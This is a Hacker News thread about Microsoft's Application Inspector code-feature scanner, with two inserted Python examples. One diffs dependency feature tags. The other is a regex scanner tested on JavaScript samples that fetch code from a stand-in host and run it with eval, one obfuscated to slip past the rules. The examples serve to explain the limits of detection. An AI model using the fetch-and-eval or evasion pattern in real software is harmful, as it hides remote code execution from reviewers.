
Microsoft Application Inspector - pjmlp
https://github.com/Microsoft/ApplicationInspector
======
gregmac
This looks like something that would be nice to have integrated in nuget.org,
showing the report output for every package/version (and maybe highlighting
deltas across versions).

If you're running this across your own project output, especially for a big
code base, it's definitely not going to be as useful as across each
dependency. For example your app having "analytics services" and "outbound
http connections" might be totally normal, but if a library you're using for
encryption adds those, that would be a concern.
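
The per-dependency, version-to-version diff described above, as an added example (not code from the original thread or from the Application Inspector project). It assumes a simplified report shape, a package name and feature tags that are all constructed for illustration (the tool's real JSON schema is not assumed), plus a hypothetical per-role allowlist of tag prefixes; anything a new version gains outside its role's allowlist is flagged for review, which is the "crypto library suddenly has outbound HTTP" case:

```python
import json

# Constructed sample reports for two versions of a hypothetical "encryption"
# dependency. This is NOT Application Inspector's real JSON schema; a report
# is reduced here to the set of feature tags reported for the package, which
# is all a version-to-version diff needs.
REPORT_V1 = json.dumps({
    "package": "Example.Crypto",
    "version": "1.0.0",
    "tags": ["Cryptography.Encryption", "Cryptography.Hash"],
})
REPORT_V2 = json.dumps({
    "package": "Example.Crypto",
    "version": "1.1.0",
    "tags": [
        "Cryptography.Encryption",
        "Cryptography.Hash",
        "Cryptography.RandomNumber",
        "Network.Connection.Http",   # new: outbound HTTP in a crypto lib
        "Analytics.Service",         # new: telemetry in a crypto lib
    ],
})

# Hypothetical allowlist: tag prefixes a dependency in a given role is expected
# to carry. Anything gained outside these prefixes is worth a human look.
ROLE_EXPECTED_PREFIXES = {
    "crypto": ("Cryptography.",),
    "http-client": ("Network.", "Data.Parsing."),
}


def load_tags(report_json: str) -> set[str]:
    """Return the set of feature tags from one (simplified) report."""
    return set(json.loads(report_json)["tags"])


def diff_tags(old: set[str], new: set[str]) -> tuple[set[str], set[str]]:
    """Tags gained and tags lost between two versions."""
    return new - old, old - new


def review_dependency(old_json: str, new_json: str, role: str) -> dict:
    """Diff two reports and flag gained tags outside the role's allowlist."""
    old, new = load_tags(old_json), load_tags(new_json)
    added, removed = diff_tags(old, new)
    allowed = ROLE_EXPECTED_PREFIXES[role]
    suspicious = {t for t in added if not t.startswith(allowed)}
    return {"added": added, "removed": removed, "suspicious": suspicious}


if __name__ == "__main__":
    result = review_dependency(REPORT_V1, REPORT_V2, "crypto")
    for key in ("added", "removed", "suspicious"):
        print(f"{key}: {sorted(result[key])}")
```

Running it on the two constructed reports flags `Network.Connection.Http` and `Analytics.Service` as suspicious while letting the new `Cryptography.RandomNumber` tag through, since it fits the dependency's declared role. The same diff over your own application's output would mostly produce noise, which is the point made above.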

~~~
nickspag
In regards to the first line of your comment, check out
[https://www.fuget.org](https://www.fuget.org). It does exactly that.

~~~
azinman2
Sorry, where's the app inspector output in this?

[https://www.fuget.org/packages/System.Net.Http](https://www.fuget.org/packages/System.Net.Http)
for example doesn't show me all of that.

------
guydalf
Just wanted to introduce myself as the lead developer on the tool. Valid
comments and questions have been dropped here and I've responded to a couple
of them already by posting clarifications below and on the project wiki. Yes
we are thinking of using the tool for repos like NuGet and maybe Github as a
service that automatically identifies detected features for each component.
Stay tuned and keep the ideas coming. Happy to answer any further questions.

~~~
proncton
My team has been desperately searching for something like this. We actually
started the effort to build our own, and were well into the prototyping phase.
You may see some contributions from us in the future.

~~~
guydalf
smile

------
c0restraint
Weird, that first screenshot [0] contains Audible's logo [1] which is an
Amazon company (far right icon in the first row of icons).

It looks like they are repurposing Audible's logo to mean "Dynamic Command
Execution" [2]

[0] [https://user-images.githubusercontent.com/47648296/72893326-...](https://user-images.githubusercontent.com/47648296/72893326-9c82c700-3ccd-11ea-8944-9831ea17f3e0.png)

[1] [https://m.media-amazon.com/images/G/01/audibleweb/arya/navig...](https://m.media-amazon.com/images/G/01/audibleweb/arya/navigation/audible_logo.2x._V517446980_.png)

[2] [https://user-images.githubusercontent.com/47648296/71859554-...](https://user-images.githubusercontent.com/47648296/71859554-2dd62480-30a4-11ea-8ee5-06b2a0d08d24.png)

~~~
xhroot
Heh, the icon is named "audible":

    
        "displayName": "Dynamic command execution",
        "detectedIcon": "fab fa-audible"
    

It's probably unintentionally used by an engineer unfamiliar with the product
as audible is more common as a descriptive word than as a brand.

[https://github.com/microsoft/ApplicationInspector/blob/08c91...](https://github.com/microsoft/ApplicationInspector/blob/08c91033526e2fae4c925be31598cc8d8f697bd6/AppInspector/preferences/tagreportgroups.json#L39-L40)

~~~
XaspR8d
Yeah this happens pretty often, though I'm surprised it continues with Font
Awesome's organizational changes: The "fab" prefix is specifically supposed to
communicate that it's an icon from the "Brands" style. (Non-brand icons use
"fas".) If you find yourself using a "fab" icon generically, you might want to
double-check what it's _supposed_ to represent...

~~~
ehsankia
Honestly, a lot of times when I'm doing quick designs, I just open the font
page with all the images and just visually pick any that looks best.
Definitely needed some sort of legal pass before release.

------
nathell
I pointed it at my Clojure project [1]. It correctly inferred [2] that the
project is doing multithreaded network connections, which is nice, especially
given that Clojure's a rather niche language.

It quite confidently pointed out an "App container" category, on grounds of
the repo containing a circleci/config.yml, which is... technically correct, I
guess, but less than useful.

[1]: [https://github.com/nathell/skyscraper/](https://github.com/nathell/skyscraper/)
[2]: [http://pliki.danieljanus.pl/appinspector-skyscraper/](http://pliki.danieljanus.pl/appinspector-skyscraper/)

------
dstaley
Just in case anyone's curious what these reports look like, I've uploaded the
reports for curl, grep, and chromium here:
[https://gracious-jang-bc0194.netlify.com/](https://gracious-jang-bc0194.netlify.com/)

------
akavel
I think an important warning should be that it can maybe, to some extent, tell
_"what's [for sure] in it"_, but I suspect it definitely shouldn't be used to
verify _"what's NOT in it"_, as in any kind of "security verification".
Meaning, if you want to hide some code/malware snippet from it on purpose, I
assume you'll definitely find a way to do that. And even if not on purpose, it
may still happen accidentally.

------
mitchty
> The tool supports scanning various programming languages including C, C++,
> C#, Java, JavaScript, HTML, Python, Objective-C, Go, Rudy, Powershell and
> more and includes html, json and text output formats with the default being
> an html report similar to the one shown here.

Is Rudy meant to be Ruby?

~~~
mikerg87
Yes - it's a typo. There is a pull request for it already.

[https://github.com/Microsoft/ApplicationInspector/pulls](https://github.com/Microsoft/ApplicationInspector/pulls)

------
SloopJon
I don't see any mention of the languages that it recognizes, but a perusal of
some of the JSON files leads me to believe that this handles many different
languages. It seems that it's by way of regular expressions, though, not
language-specific parsing.

~~~
kozhevnikov
Does it support HTML? Can one parse HTML with regex?

~~~
singlow
You can't parse it _properly_ with a Regular Expression, but you can parse it
with regex-like systems. However I doubt it is parsing outright - it only has
to look for certain keywords and patterns that indicate certain behaviors.

~~~
guydalf
Correct. We don't need to parse it per se, just look for use of features that
are easy to identify, like XmlHttpRequest, Json.Parse use, etc.
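
A worked illustration of the point made in this sub-thread (keyword and pattern matching rather than parsing) and of akavel's warning above that the tool can say what is in a code base but not what is absent. This is an added example, not Application Inspector's code or rule set: the three rules, the tag names and both JavaScript samples are constructed for illustration. The second sample does exactly what the first does, but assembles every identifier a rule keys on at run time, so a line-oriented regex scanner finds nothing:

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    tag: str
    pattern: re.Pattern


# Hypothetical rules written for this example; they are not Application
# Inspector's own rule set, only the same idea: match a feature's tell-tale
# identifiers with a regex, without parsing the language.
RULES = (
    Rule("Network.Connection.Http",
         re.compile(r"\bXMLHttpRequest\b|\bfetch\s*\(|\bhttp\.(?:get|request)\s*\(")),
    Rule("Data.Parsing.JSON", re.compile(r"\bJSON\.parse\s*\(")),
    Rule("Execution.Dynamic", re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")),
)


def scan(source: str) -> dict[str, list[int]]:
    """Map each tag to the 1-based line numbers where one of its patterns hits."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule in RULES:
            if rule.pattern.search(line):
                hits.setdefault(rule.tag, []).append(lineno)
    return hits


def detected_tags(source: str) -> set[str]:
    """Just the tag names: the 'what is in it' summary a report would show."""
    return set(scan(source))


# Constructed JavaScript sample, written the obvious way.
CLEAN_SAMPLE = """\
var r = new XMLHttpRequest();
r.open("GET", "https://example.invalid/telemetry");
var cfg = JSON.parse(r.responseText);
eval(cfg.bootstrap);
"""

# Constructed sample with identical behaviour: every identifier a rule keys on
# is built from string pieces at run time, so no line contains a literal match.
OBFUSCATED_SAMPLE = """\
var C = window["XMLHttp" + "Request"];
var r = new C();
r.open("GET", "https://example.invalid/telemetry");
var cfg = JSON["pa" + "rse"](r.responseText);
window["ev" + "al"](cfg.bootstrap);
"""


if __name__ == "__main__":
    print("clean      :", scan(CLEAN_SAMPLE))
    print("obfuscated :", scan(OBFUSCATED_SAMPLE))
```

The clean sample yields all three tags with their line numbers; the obfuscated sample yields an empty report, which is the reason a "no network features found" result from a pattern scanner is evidence of nothing. The same blind spot applies to the legitimate cases the thread mentions: a regex sees keywords, not whether HTML or any other language is well-formed.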

------
SamuelAdams
I wonder if they could marry this with ILSpy [1]. Basically point it at a
compiled program, de-compile it, then analyze the decompiled code to see what
it's doing. Might be useful in malware analysis and other areas.

[1]:
[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)

------
wongarsu
I'm simultaneously amused and saddened that even apps released by Microsoft('s
github organization) don't support white-space in paths.

~~~
malkia
It's a big company! Even people are not that consistent! For one, I'm seeing
that the "mono" culture (not sure if pun intended, or not) is going away from
there!

------
neves
I'd love to see the generated output of famous programs like grep, curl or
chromium. It would give a better idea about what it does.

~~~
dstaley
Here you go! [https://gracious-jang-bc0194.netlify.com/](https://gracious-jang-bc0194.netlify.com/)

~~~
neves
Excellent! Really nice app. Now I understand it a lot better.

------
guydalf
See
[https://github.com/microsoft/ApplicationInspector/wiki/6.-Un...](https://github.com/microsoft/ApplicationInspector/wiki/6.-Understanding-Results),
which answers questions on the choice of icons, and
[https://github.com/microsoft/ApplicationInspector/wiki/2.1-F...](https://github.com/microsoft/ApplicationInspector/wiki/2.1-Field:-applies_to-\(languages-support\)),
which talks about language support.

------
ocdtrekkie
I could see this as handy when I'm trying to troubleshoot an
opaque/proprietary/legacy application. Things like knowing it's talking to
environment variables or the registry would be a lot of help drilling down
into what it's touching so I know where to look for what's breaking it.

------
guydalf
Good point. At a minimum it should clearly state that while the tool didn't
"find" such a feature, that should not be taken as a security-reliable result.
See
[https://github.com/microsoft/ApplicationInspector/wiki/6.-Un...](https://github.com/microsoft/ApplicationInspector/wiki/6.-Understanding-Results)

------
kozhevnikov
Sounds like builtwith.com for codebases. I wonder if one can run it against
all company repos and generate an accurate stackshare.io alternative.

------
whatsmyusername
Unusable on osx. It fires off 20+ notarization errors on run.

~~~
guydalf
Mac Catalina restrictions appear to be the issue, where app launch checks were
relaxed for a bit and then made more aggressive very recently. We added an
issue on the app project site to look into whether the app or just .NET Core
or both need a macOS notice fix, but there's a workaround discussed here
[https://www.cultofmac.com/672576/cant-launch-your-apps-on-ma...](https://www.cultofmac.com/672576/cant-launch-your-apps-on-macos-catalina-heres-the-fix/)

~~~
guydalf
Affects .NET Core 2.1, 3.0, 3.1 - not app-specific, but a workaround exists as
mentioned and is tracked here
[https://github.com/microsoft/ApplicationInspector/issues/123](https://github.com/microsoft/ApplicationInspector/issues/123)

------
julienfr112
What does MS Application Inspector have to say about MS Application Inspector?

------
InterestBazinga
One thing I'm not a fan of in C# is how often libraries lack bundled source
code, while in other similar languages (e.g. Java) you can use "Go to
Definition" on pretty much any third-party library/anything without hassle.

~~~
throwabdbdndj
This is changing (slowly) for .NET. NuGet packages support something called
Source Link [1] and can embed URLs to GitHub/Bitbucket/etc.

IDEs like Visual Studio and Rider can download the code on demand and debug
step-through.

Tons of popular .NET libs (including the Microsoft ones) already support this.

[1] [https://docs.microsoft.com/en-us/dotnet/standard/library-gui...](https://docs.microsoft.com/en-us/dotnet/standard/library-guidance/sourcelink)

